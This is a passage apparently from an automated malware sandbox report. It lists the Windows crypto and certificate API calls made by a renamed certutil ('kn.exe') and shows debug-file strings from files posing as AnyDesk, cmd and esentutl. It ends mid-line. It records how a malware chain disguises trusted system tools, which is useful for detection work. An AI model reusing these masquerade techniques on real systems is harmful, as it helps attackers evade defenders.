              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF68FC6E9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68FCD2994
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF68FCA099C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC629A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68FC629A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCA8940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF68FCAC940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68FC2C960
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCD4914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF68FC8E914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF68FC1A8CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA08EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF68FCA08EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68FD0E8B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF68FCA0844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF68FCD8814
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC26824 CryptHashCertificate,GetLastError,#357,7_2_00007FF68FC26824
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCB07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC067CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC067CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC927BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC927BC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC8C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA07F4 BCryptDestroyKey,#205,#357,7_2_00007FF68FCA07F4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA07A4 BCryptDestroyHash,#205,#357,7_2_00007FF68FCA07A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA0740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF68FCA0740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68FCDA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92724 CryptDecodeObject,GetLastError,#357,7_2_00007FF68FC92724
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC426E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF68FC426E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD66D8 NCryptFreeObject,#360,7_2_00007FF68FCD66D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF68FCC86D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC74694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF68FC74694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC36694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF68FC36694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD6654 NCryptGetProperty,#360,7_2_00007FF68FCD6654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF68FC6A654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC28600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF68FC28600
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC30630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC30630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68FC2C5D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC625E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF68FC625E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68FCDA590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF68FC9E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA65B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF68FCA65B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF68FD0A58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF68FC2C514
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCCE516
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC724D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF68FC724D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC144E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC144E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC98488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC98488
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF68FC7C450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF68FC7A450
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC24410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC24410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF68FCD8404
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC423E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF68FC423E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF68FC2E3B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC96374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF68FC96374
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC92358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF68FC92358
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC40300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF68FC40300
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF68FD0A2E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF68FCC2278
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC76280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC76280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF68FCD8298
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68FCCE274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD06214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF68FD06214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68FC9E1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF68FCDA1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF68FC8A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC86194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68FC86194
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68FC6417C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF68FCC61AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC421A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF68FC421A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0613C CryptDecodeObjectEx,7_2_00007FF68FD0613C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC360DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68FC360DA
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF68FCCE044
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC74070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF68FC74070
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF68FC35FE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF68FD05FF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68FCA9F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCA5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF68FCA5FA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC75F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF68FC75F54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF68FC3FF64
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC57F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF68FC57F14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC95F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF68FC95F04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD05F20 CryptDecodeObjectEx,7_2_00007FF68FD05F20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD7EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF68FCD7EE8
              Source: AnyDesk.PIFBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.0000000021982000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 